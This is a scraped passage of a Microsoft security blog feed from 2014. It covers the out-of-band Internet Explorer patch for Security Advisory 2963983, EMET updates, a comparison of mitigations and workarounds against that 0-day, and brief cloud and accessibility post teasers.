a.m. webcast has reached <span style="color:black;font-family:&#39;Segoe UI&#39;,&#39;sans-serif&#39;;font-size:10pt;">capacity, so a second webcast has been scheduled for 2 p.m. on Friday, May 2. Details on registration can be found <a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032587812&amp;Culture=en-US&amp;community=0">here</a>.</span></em><br /></span></p> <p><span style="font-family:Calibri;font-size:small;">For more information, please see the Microsoft News </span><a href="http://blogs.technet.com/b/microsoft_blog/archive/2014/05/01/updating-internet-explorer-and-driving-security.aspx"><span style="color:#0563c1;font-family:Calibri;font-size:small;">blog</span></a><span style="font-family:Calibri;font-size:small;">.<br /> <br /> </span><a title="Dustin Childs" href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Dustin Childs</span></a><br /><span style="font-family:Calibri;font-size:small;"> Group Manager, Response Communications<br /> Trustworthy Computing</span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3628656&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Bulletin WebcastSecurity Bulletinssecurity bulletin releaseOOBInternet Explorer (IE) Out-of-Band Release to Address Microsoft Security Advisory 2963983http://blogs.technet.com/b/msrc/archive/2014/05/01/out-of-band-release-to-address-microsoft-security-advisory-2963983.aspxThu, 01 May 2014 15:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e0e91710-8024-427c-9ce4-a9347bf8a814Dustin C. Childs0<p><span style="font-family:Calibri;font-size:small;">At approximately 10 a.m. PDT, we will release an out-of-band security update to address the issue affecting Internet Explorer (IE) that was first discussed in Security Advisory 2963983. This update is fully tested and ready for release for all affected versions of the browser. </span></p> <p><span style="font-family:Calibri;"><span style="font-size:small;">The majority of customers have automatic updates enabled and will not need to take any action because protections will be downloaded and installed automatically. If you&rsquo;re unsure if you have automatic updates, or you haven&rsquo;t enabled </span></span><a href="http://windows.microsoft.com/en-US/windows/help/windows-update"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Automatic Update</span></a><span style="font-family:Calibri;font-size:small;">, now is the time.&nbsp; </span></p> <p><span style="font-family:Calibri;font-size:small;">For those manually updating, we strongly encourage you to apply this update as quickly as possible following the directions in the released security bulletin.</span></p> <p><span style="font-family:Calibri;"><span style="font-size:small;">We have made the decision to issue a security update for Windows XP users. Windows XP is no longer supported by Microsoft, and we continue to encourage customers to migrate to a modern operating system, such as Windows 7 or 8.1. Additionally, customers are encouraged to upgrade to the latest version of Internet Explorer, IE 11.</span></span></p> <p><span style="font-family:Calibri;font-size:small;">Please join us tomorrow at 11 a.m. PDT for a webcast where we will present information on the bulletin. </span></p> <p><span style="font-family:Calibri;font-size:small;">Registration information:</span></p> <p><span style="font-family:Calibri;font-size:small;">Date: Friday, May 2, 2014<br /> Time: 11:00 a.m. PDT <br /> Registration: </span><a href="https://msevents.microsoft.com/CUI/InviteOnly.aspx?EventID=7F-7C-CD-0D-1D-9F-4D-AC-46-22-BC-40-40-E8-D9-93"><span style="color:#0563c1;font-family:Calibri;font-size:small;">https://msevents.microsoft.com/CUI/InviteOnly.aspx?EventID=7F-7C-CD-0D-1D-9F-4D-AC-46-22-BC-40-40-E8-D9-93</span></a></p> <p><span style="font-family:Calibri;font-size:small;">More information about the upcoming security bulletin can be found at Microsoft&rsquo;s </span><a href="https://technet.microsoft.com/library/security/ms14-may"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Advance Notification Service (ANS) webpage</span></a><span style="font-family:Calibri;font-size:small;">.You can also stay apprised of the MSRC team&rsquo;s recent activities by following us on Twitter at </span><a title="@MSFTSecResponse" href="https://twitter.com/msftsecresponse"><span style="color:#0563c1;font-family:Calibri;font-size:small;">@MSFTSecResponse</span></a><span style="font-family:Calibri;font-size:small;">.&nbsp;</span></p> <p><span style="font-family:Calibri;font-size:small;">Thank you,<br /> </span><a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Dustin Childs</span></a><br /><span style="font-family:Calibri;font-size:small;"> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3628629&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Security BulletinOOBInternet Explorer (IE) Continuing with Our Community Driven, Customer Focused Approach for EMEThttp://blogs.technet.com/b/srd/archive/2014/04/30/continuing-with-our-community-driven-customer-focused-approach-for-emet.aspxWed, 30 Apr 2014 18:06:04 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:59b5f803-7ef1-463d-ac64-88b3c9eab15aswiat0<p><span style="font-family:Calibri;font-size:medium;">The Enhanced Mitigation Experience Toolkit, best known as EMET, helps raise the bar against attackers gaining access to computer systems. Since the first release of EMET in 2009, our customers and the security community have adopted EMET and provided us with valuable feedback. Feedback both in </span><a href="http://social.technet.microsoft.com/Forums/en/emet/threads" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">forums</span></a><span style="font-family:Calibri;font-size:medium;"> and through </span><a href="http://www.microsoft.com/en-us/microsoftservices/support.aspx" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Microsoft Premier Support Services</span></a><span style="font-family:Calibri;font-size:medium;">, which provides enterprise support for EMET, has helped shape the new EMET capabilities to further expand the range of scenarios it addresses.</span></p> <p><span style="font-family:Calibri;font-size:medium;">Today, we will be talking about how we are taking our community driven and customer focused approach even further. We will cover both the present version (4.1) as well as the future versions (5.0 Technical Preview and beyond) in detail next.</span></p> <p><span style="font-size:medium;"><span style="font-family:Calibri;">What you are about to read is the outcome of our work over the past couple of months listening to customer and community feedback. Keep in mind that we are always working on new things, so&hellip; stay tuned!&nbsp;:)</span><span style="font-family:Calibri;"> As always, please </span></span><a href="mailto:emet_feedback@microsoft.com"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">let us know</span></a><span style="font-family:Calibri;font-size:medium;"> what you think.</span></p> <p><span style="font-family:Calibri;font-size:medium;">- The EMET Team</span></p> <div><span style="font-family:Times New Roman;font-size:medium;"> </span> <h1><span style="font-family:Calibri Light;">EMET 5.0 Technical Preview available on Microsoft Connect</span></h1> <span style="font-family:Times New Roman;font-size:medium;"> </span></div> <p><span style="font-family:Calibri;font-size:medium;">The release of EMET 5.0 Technical Preview in late February had a tremendous response from customers and the industry. We have received a lot of feedback on the new features and how they can be further improved. We believe EMET is and should continue to be customer-driven, where the feedback we receive is an integral part of our development process. In order to facilitate and streamline the communication between you (our beloved customers) and us (the EMET team), we have decided to create a project on </span><a href="https://connect.microsoft.com/directory/?keywords=EMET" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Microsoft Connect for EMET 5.0 Technical Preview</span></a><span style="font-family:Calibri;font-size:medium;">. Simply access the Microsoft Connect tool to download packages &ndash; which will be released periodically and frequently &ndash; and have a taste of what is coming up for EMET 5.0. What is great about this new tool is that, you will able to provide direct feedback, respond to surveys, and find all the new additions.</span></p> <p><span style="font-family:Calibri;font-size:medium;">The first download package for EMET 5.0 Technical Preview is already available, and it includes fixes for many items reported to us. Please subscribe to the </span><a href="https://connect.microsoft.com/directory/?keywords=EMET" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Microsoft Connect for EMET 5.0 Technical Preview</span></a><span style="font-family:Calibri;font-size:medium;"> (you will need a Microsoft Account for that), download the installation package and continue to send your great ideas to us. </span></p> <div><span style="font-family:Times New Roman;font-size:medium;"> </span> <h1><span style="font-family:Calibri Light;">EMET 4.1 Update 1</span></h1> <span style="font-family:Times New Roman;font-size:medium;"> </span></div> <p><span style="font-family:Calibri;font-size:medium;">Today, we are releasing EMET 4.1 Update 1, which contains improvements and bug-fixes. More details on the list of the introduced improvements are available at this </span><a href="https://support.microsoft.com/kb/2964759" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">KB article</span></a><span style="font-family:Calibri;font-size:medium;">. These improvements are the outcome of the feedback you have given us and the forward thinking work we continue to do. We recommend all EMET 4.1 customers </span><a href="http://www.microsoft.com/en-us/download/details.aspx?id=41138" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">download this new version</span></a><span style="font-family:Calibri;font-size:medium;"> and install it, since the benefits of all these improvements are noticeable. The upgrade experience is seamless, as all the current settings can be kept as-is by choosing &ldquo;Keep Existing Settings&rdquo; option during the install process. We also recommend all EMET 3.0 and 4.0 customers to upgrade to EMET 4.1 Update 1 (remember EMET 3.0 will go out of support next June!).</span></p> <div><span style="font-family:Times New Roman;font-size:medium;"> </span> <h1><span style="font-family:Calibri Light;">Certificate Trust default rules update</span></h1> <span style="font-family:Times New Roman;font-size:medium;"> </span></div> <p><span style="font-family:Calibri;font-size:medium;">With EMET 4.0, we introduced the Certificate Trust, which is a feature that detects Man in the Middle attacks that leverage maliciously-issued SSL/TLS certificates. The feature works through a configurable certificate-pinning mechanism, which binds the certificate for a specified website to a trusted Root Certificate Authority (Root CA). This feature comes pre-configured with a set of rules related to authentication portals for Microsoft services and other third-party services. These default rules used in Certificate Trust don&rsquo;t require frequent updates. It can happen, however, that an organization decides to renew its SSL/TLS certificate, for different reasons (e.g. natural aging of the certificate, change in their PKI infrastructure, response to a security incident, etc.). When a change like this occurs, the renewed SSL/TLS certificate may be issued under a different Root CA not included in the default Certificate Trust configuration, resulting in EMET detecting the new certificate as malicious. </span></p> <p><span style="font-family:Calibri;font-size:medium;">Since several SSL/TLS certificates for many popular third-party websites were recently updated, we are </span><a href="http://support.microsoft.com/kb/2961016" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">releasing an easy to install Fix it solution</span></a><span style="font-family:Calibri;font-size:medium;"> that will update the default Certificate Trust rules, while maintaining the ones that you have manually added. The Fix it can be either installed on a standalone machine by just double-clicking it, or it can be silently deployed throughout a network with your favorite deployment mechanism. If you have just downloaded and installed EMET 4.1 Update 1 you don&rsquo;t need to apply this Fix it solution as the new rules are already included. You can use the link below to download this solution:</span></p> <p align="center"><a href="http://go.microsoft.com/?linkid=9846110"><img title="Microsoft Fix it 51012" style="border:0px currentColor;" alt="Microsoft Fix it 51012" src="http://blogs.technet.com/resized-image.ashx/__size/142x54/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0574.fixit.png" /></a></p> <p align="center"><a title="Microsoft Fix it" href="http://go.microsoft.com/?linkid=9846110" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Fix this problem</span></a><br /><span style="font-family:Calibri;font-size:medium;"> Microsoft Fix it 51012</span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3628435&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">EMET Protection strategies for the Security Advisory 2963983 IE 0dayhttp://blogs.technet.com/b/srd/archive/2014/04/30/protection-strategies-for-the-security-advisory-2963983-ie-0day.aspxWed, 30 Apr 2014 15:03:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:2bdd67b0-85d2-4512-ae36-aee53ecc634bSRD Blog Author0<p>We&rsquo;ve received a number of customer inquiries about the workaround steps documented in <a href="https://technet.microsoft.com/en-us/library/security/2963983.aspx">Security Advisory 2963983</a> published on Saturday evening. We hope this blog post answers those questions.</p> <p><b>Steps you can take to stay safe</b></p> <p>The security advisory lists several options customers can take to stay safe. Those options are (in summary):</p> <ul> <ul> <li>Deploy the Enhanced Mitigation Experience Toolkit (EMET)</li> <li>Block access to VGX.DLL</li> <li>Enable Enhanced Protected Mode</li> <li>Use built-in Internet Explorer configuration options to disable active scripting</li> </ul> </ul> <p>We&rsquo;ll address the questions we have heard from customers in relation to each of those options.</p> <p><b>Update on Enhanced Mitigation Experience Toolkit (EMET) protections</b></p> <p>The original <a href="https://technet.microsoft.com/en-us/library/security/2963983.aspx">security advisory</a> and the <a href="http://blogs.technet.com/b/srd/archive/2014/04/26/more-details-about-security-advisory-2963983-ie-0day.aspx">SRD blog post from this past week</a> both listed EMET 4.1 as effective in helping to block attacks. In our deeper analysis of the two exploit samples we have, we found that EMET 4.0 is also effective in helping to block attacks. The advisory and blog have both been updated to point out that both EMET 4.0 and EMET 4.1 are effective. Our technical preview of EMET version 5.0 also is effective in this regard; however, we do not recommend a technical preview for production deployment. Several customers asked which specific EMET mitigations were effective in helping to block attacks. We&rsquo;ve prepared the following table to answer those questions:</p> <table border="1"> <tbody> <tr> <td></td> <td><b>EMET 4.0 / EMET 4.1</b></td> <td><b>EMET 5 Tech Preview</b></td> </tr> <tr> <td>Heapspray Protection</td> <td>Effective</td> <td>Effective</td> </tr> <tr> <td>StackPivot ROP Mitigation</td> <td>Effective with Deep Hooks enabled</td> <td>Effective</td> </tr> <tr> <td>Caller ROP Mitigation</td> <td>Effective with Deep Hooks enabled</td> <td>Effective</td> </tr> <tr> <td>MemProt ROP Mitigation</td> <td>Effective with Deep Hooks enabled</td> <td>Effective</td> </tr> <tr> <td>EAF+</td> <td>Not present. EMET 4.x EAF does not block this attack.</td> <td>Effective</td> </tr> <tr> <td>Attack Surface Reduction</td> <td>Not present</td> <td>Effective because it blocks VGX.DLL and FLASH.ocx in Internet Zone</td> </tr> </tbody> </table> <p>As you can see, three of the four EMET 4.x mitigations capable of blocking this attack required the Deep Hooks feature to be enabled. The attackers in this case leveraged ZwProtectVirtualMemory which is not protected unless Deep Hooks is enabled. Deep Hooks is not enabled in the default configuration for EMET 4.0 or EMET 4.1. The default EMET 4.x install was effective in helping to block attacks due to the Heapspray mitigation alone; however, the ROP mitigations are more robust and less likely to be bypassed than the Heapspray mitigation so we recommend enabling Deep Hooks to get the full protection of the ROP mitigations.</p> <p>We have a planned update for EMET 4.1 scheduled for release on the Microsoft Download Center today. EMET 4.1 Update 1 was primarily released to address minor bug fixes. However, the update also will be enabling Deep Hooks for EMET 4.1 by default. We will post an additional SRD blog post when the EMET 4.1 Update 1 bits are live with a link to the KB describing the new release.</p> <p><b>Clarifying the VGX.DLL workaround</b></p> <p>The exploits we have seen have relied on Vector Markup Language (VML) to trigger the use-after-free vulnerability. As we analyzed different ways to trigger this vulnerability, we concluded that additional attacker research would be required to develop an exploit that did not rely on the presence of VML. Therefore, we recommended in the original security advisory that customers disable VGX.dll, the library that provides VML functionality. Customers can choose to either ACL the file or unregister the DLL. Unregistering the DLL can be accomplished with a single command line, silently, with no user interaction, and may be scripted to run via Microsoft System Center Configuration Manager or other infrastructure management solutions. VML is not natively supported by most web browsers today, so this remediation option may have the least impact on enterprise web app compatibility.</p> <p>However, we&rsquo;d like to clarify that VGX.DLL does not contain the vulnerable code leveraged in this exploit. Disabling VGX.DLL is an exploit-specific workaround that provides an immediate, effective workaround to help block known attacks.</p> <p><b>Clarifying the IE Enhanced Protected Mode workaround</b></p> <p>We also received questions about the Internet Explorer Enhanced Protected Mode workaround. Enhanced Protected Mode will help protect 64-bit Internet Explorer users from this attack. There is a difference between Internet Explorer 10 and Internet Explorer 11 that led to some confusion. Internet Explorer 10 has one setting to enable and Internet Explorer 11 has two settings to enable. The 64-bit aspect of Internet Explorer is a key element of this workaround as the heap spray attack is not effective in 64-bit address space, leading to a failed exploit. Enhanced Protected Mode alone on 32-bit Internet Explorer 11 is not effective in blocking the attack. The screenshots below illustrate the Internet Explorer 10 versus Internet Explorer 11 &ldquo;checkbox&rdquo; differences:</p> <table border="1"> <tbody> <tr> <td>IE10 64bit EPM (one setting to mitigate)</td> <td>IE11 64bit EPM (two settings to mitigate)</td> </tr> <tr> <td><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/epm1.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/epm1.png" border="0" /></a></td> <td><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/epm2.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/epm2.png" border="0" /></a></td> </tr> </tbody> </table> <p><b>Choosing the best workaround for your environment</b></p> <p>The security advisory provides several different recommended workarounds because each customer environment is different and there might be a different &ldquo;best&rdquo; workaround for different customers. Each workaround has different pros and cons, described below.</p> <ul> <li>Option 1: Deploy the Enhanced Mitigation Experience Toolkit <ul> <li>Pro: As described above, helps block exploits leveraging this vulnerability by adding several different hardening mechanisms to Windows.</li> <li>Pro: Even after the eventual security update is applied, continues providing protection against other potential security vulnerabilities in Microsoft&rsquo;s and third party products.</li> <li>Con: Microsoft recommends testing before deploying widely across enterprise network as previous versions of EMET have introduced application compatibility issues.</li> </ul> </li> <li>Option 2: Block access to VGX.dll <ul> <li>Pro: Very simple workaround. Easy and quick to deploy across enterprise network.</li> <li>Con: May not protect against future or new exploits that may emerge to exploit this vulnerability.</li> </ul> </li> <li>Option 3: Enable Enhanced Protected Mode on 64-bit Internet Explorer</li> </ul> <ul> <li style="list-style-type:none;"> <ul> <li>Pro: Helps block exploits leveraging this vulnerability and potentially other vulnerabilities that may be discovered in the future.</li> <li>Con: Requires 64-bit Windows and requires running 64-bit version of Internet Explorer.</li> </ul> </li> </ul> <p>In general, for customers that already have EMET 4.x deployed, enabling Deep Hooks is likely to be the best workaround option. For customers who have not yet deployed EMET 4.x, the priority should be on immediate, quick protection which is likely to be blocking access to VGX.dll. Deploying EMET is the best long-term protection but doing so without first testing in your environment is unlikely to be the best option. As always, we recommend staying up-to-date with the latest version of Internet Explorer for improved security features such as Enhanced Protected Mode, better backward compatibility through Enterprise Mode, increased performance, and support for the modern web standards that run today&rsquo;s websites and services.</p> <p><b>Conclusion</b></p> <p>We hope that this blog post helps guide you in choosing the best mitigation strategy for your environment. The Internet Explorer team is hard at work preparing a security update that will be released as soon as it is ready for broad deployment. Stay tuned to the Microsoft Security Response Center (MSRC) blog [link] for any news about the availability of an update.</p> <p>- Elia Florio and Jonathan Ness, MSRC Engineering</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3628491&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">MitigationsworkaroundsInternet Explorer (IE)0-dayEMET Security Trends in Cloud Computing Part 1: Financial Serviceshttp://blogs.technet.com/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspxTue, 29 Apr 2014 17:46:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:5088c27b-1670-4cb4-90e4-8ed342bed2dfTrusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>In 2012, Microsoft Trustworthy Computing launched the <a target="_blank" href="https://roianalyst.alinean.com/msft/AutoLogin.do?d=563612287085088525">Cloud Security Readiness Tool</a> (CSRT) to help organizations understand their current IT infrastructure, identify relevant industry regulations, and evaluate whether cloud adoption will meet their business needs.&nbsp;</p> <p>The aggregate data from the survey have also provided some interesting insights, and we&rsquo;ll be sharing some of those findings in a four-part blog series beginning today. We&rsquo;ll take a closer look at four specific industries &ndash; financial services, healthcare, retail and public sector (government), and examine how cloud adoption could reduce security risks in those industries.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspx">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3628396&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">cloud securityCustomersrisk managementRecoveryAdrienne HallCloudcustomer perspectiveITcloud trust studyCloud Computingresearchcloud servicesTrustworthy ComputingMicrosoftDataIT Pros More Details about Security Advisory 2963983 IE 0dayhttp://blogs.technet.com/b/srd/archive/2014/04/26/more-details-about-security-advisory-2963983-ie-0day.aspxSun, 27 Apr 2014 02:44:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:ad02d6f7-f565-4cd8-bd7f-8c372d1b1e9fswiat0<p>Today we released <a title="Security Advisory 2963983" href="https://technet.microsoft.com/en-US/library/security/2963983">Security Advisory 2963983</a> regarding a potential vulnerability in Internet Explorer reported by FireEye and currently under investigation.</p> <p>We are working closely with <a title="FireEye" href="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html">FireEye</a> to investigate this report of a vulnerability which was found used in very limited targeted attack:</p> <p>-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; the vulnerability is a &ldquo;use-after-free&rdquo; memory corruption and the exploit observed seems to target IE9, IE10 and IE11;</p> <p>-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; while the vulnerability affects Internet Explorer, the exploit relies deeply on two other components to successfully trigger code execution and in particular it requires presence VML and Flash components;</p> <p>Our partner FireEye posted an analysis with some details&nbsp;and confirmed that the exploit wasn&rsquo;t able to run successfully when EMET protection is added for Internet Explorer. The following EMET configuration can help to mitigate this specific exploit seen in the wild:</p> <p>-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; EMET 4.0 / 4.1: all mitigations enabled, deephooks/antidetour enabled</p> <p>-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; EMET 5.0TP: all mitigations enabled (including ASR/EAF+), deephooks/antidetour enabled&nbsp;</p> <p>Also, given the current details shared by FireEye, we believe that the exploit can be also mitigated by:</p> <p>-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Disable VML in IE.</p> <p>-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Run Internet Explorer in &ldquo;Enhanced Protected Mode&rdquo; configuration and 64-bit process mode, which is available for IE10 and IE11 in the Internet Options settings:</p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/EPM.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/EPM.png" border="0" /></a></p> <p><span>Cristian Craioveanu,&nbsp;Elia Florio and Chengyun Chu, MSRC Engineering</span></p> <p align="center"></p> <p>&nbsp;</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3628241&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">EMET IE 0day Microsoft releases Security Advisory 2963983http://blogs.technet.com/b/msrc/archive/2014/04/26/microsoft-releases-security-advisory.aspxSun, 27 Apr 2014 02:25:12 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:ca0fc134-646d-41ab-b12f-073d0635dbc9Dustin C. Childs0<p>Today, we released <a href="https://technet.microsoft.com/en-US/library/security/2963983">Security Advisory 2963983</a> regarding an issue that impacts Internet Explorer. At this time, we are only aware of limited, targeted attacks. This issue allows remote code execution if users visit a malicious website with an affected browser. This would typically occur by an attacker convincing someone to click a link in an email or instant message.</p> <p>Our initial investigation has revealed that Enhanced Protected Mode, on by default for the modern browsing experience in Internet Explorer 10 and Internet Explorer 11, as well as <a href="http://support.microsoft.com/kb/2458544">Enhanced Mitigation Experience Toolkit (EMET) 4.1</a> and&nbsp;EMET 5.0 Technical Preview, will help protect against this potential risk. We also encourage you to follow the &quot;Protect Your Computer&quot; guidance of enabling a firewall, applying all software updates and installing anti-virus and anti-spyware software. Additionally, we encourage everyone to exercise caution when visiting websites and avoid clicking suspicious links, or opening email messages from unfamiliar senders. Additional information can be found at <a href="http://www.microsoft.com/protect"><span style="color:#0563c1;">www.microsoft.com/protect</span></a>.</p> <p>We are monitoring the threat landscape very closely and will continue to take appropriate action to help protect customers.</p> <p>Thank you,<br /> <br /> <a title="Dustin Childs" href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;">Dustin Childs</span></a><br /> Group Manager, Response Communications<br /> Trustworthy Computing</p> <p></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3628234&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">AdvisoryZero-Day ExploitSecurityInternet Explorer (IE)Vulnerability Microsoft’s commitment to the Core Infrastructure Initiativehttp://blogs.technet.com/b/trustworthycomputing/archive/2014/04/24/microsoft-s-commitment-to-the-core-infrastructure-initiative.aspxThu, 24 Apr 2014 22:21:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:8dfed93b-8aa7-4a92-80f8-098c9183e51cTrusted Cloud Team0<p><strong>By Steve Lipner, Partner Director of Software Security, Microsoft Corporation</strong></p> <p><a target="_blank" href="http://www.microsoft.com/security/sdl/story/">For more than a decade</a>, we&rsquo;ve made significant investments in securing our devices and services. What people may not know is that we&rsquo;ve also been involved in cross-platform activities for some time.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/24/microsoft-s-commitment-to-the-core-infrastructure-initiative.aspx">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/24/microsoft-s-commitment-to-the-core-infrastructure-initiative.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3628121&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">cloud security10 Year MilestoneCollective DefenseCloud Computingcyber securitycloud servicesTrustworthy ComputingSteve LipnerMicrosoft Cloud Solutionssecurity community Jenny Lay-Flurrie Scaled Plenty of Brick Walls to Become a Leader of Accessibility at Microsofthttp://blogs.msdn.com/b/accessibility/archive/2014/04/24/jenny-lay-flurrie-scaled-plenty-of-brick-walls-to-become-a-leader-of-accessibility-at-microsoft.aspxThu, 24 Apr 2014 13:18:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10519978Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10519978http://blogs.msdn.com/b/accessibility/archive/2014/04/24/jenny-lay-flurrie-scaled-plenty-of-brick-walls-to-become-a-leader-of-accessibility-at-microsoft.aspx#commentsJenny Lay-Flurrie has enjoyed an impressive career so far, one that has taken her from Birmingham, England, to the Microsoft campus in Redmond, Wa. Deaf most of her life, Lay-Flurrie has faced a series of what she calls brick walls, moments when the...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/04/24/jenny-lay-flurrie-scaled-plenty-of-brick-walls-to-become-a-leader-of-accessibility-at-microsoft.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10519978" width="1" height="1"> The Microsoft Approach to Compliance in the Cloudhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/04/22/the-microsoft-approach-to-compliance-in-the-cloud.aspxWed, 23 Apr 2014 02:45:27 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:90caf887-b4a5-4578-b027-017afb0a860aTrusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>Our customers do business in almost every industry and country around the world. Many of them need to meet regulatory compliance and certification requirements.&nbsp; When they trust a cloud service provider to manage infrastructure, applications, or data for them, that service provider becomes a partner that they trust to help meet and maintain their compliance and certification requirements.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/22/the-microsoft-approach-to-compliance-in-the-cloud.aspx">Read more&gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/22/the-microsoft-approach-to-compliance-in-the-cloud.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3627951&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicesAdrienne Hallcustomer perspectiveCloud Computingcloud servicesMicrosoftMicrosoft Cloud Solutions Closed Captioned-Videos Could Help All Students, Study Suggestshttp://blogs.msdn.com/b/accessibility/archive/2014/04/22/closed-captioned-videos-could-help-all-students-study-suggests.aspxTue, 22 Apr 2014 14:14:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10519976Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10519976http://blogs.msdn.com/b/accessibility/archive/2014/04/22/closed-captioned-videos-could-help-all-students-study-suggests.aspx#commentsA new study found that a wide range of university students, not just those who are deaf or have limited hearing, could benefit from using closed-captioned videos in classrooms, Media Access Australia reported. When a professor used videos with closed...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/04/22/closed-captioned-videos-could-help-all-students-study-suggests.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10519976" width="1" height="1"> Panel: “Protecting Privacy & National Security in the Digital Age”http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/21/panel-protecting-privacy-amp-national-security-in-the-digital-age.aspxMon, 21 Apr 2014 22:03:55 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:bb4a3819-3bc7-416a-95d8-83ac52d73a79Trusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong></p> <p>As technology continues to connect us in seemingly infinite ways, people are increasingly discussing appropriate levels of trade-offs that come with modern day conveniences. In line with the company&rsquo;s role over the past decades, Microsoft continues to be a key participant and driver of these conversations.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/21/panel-protecting-privacy-amp-national-security-in-the-digital-age.aspx">Read more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/21/panel-protecting-privacy-amp-national-security-in-the-digital-age.aspx">read more</a>)<img 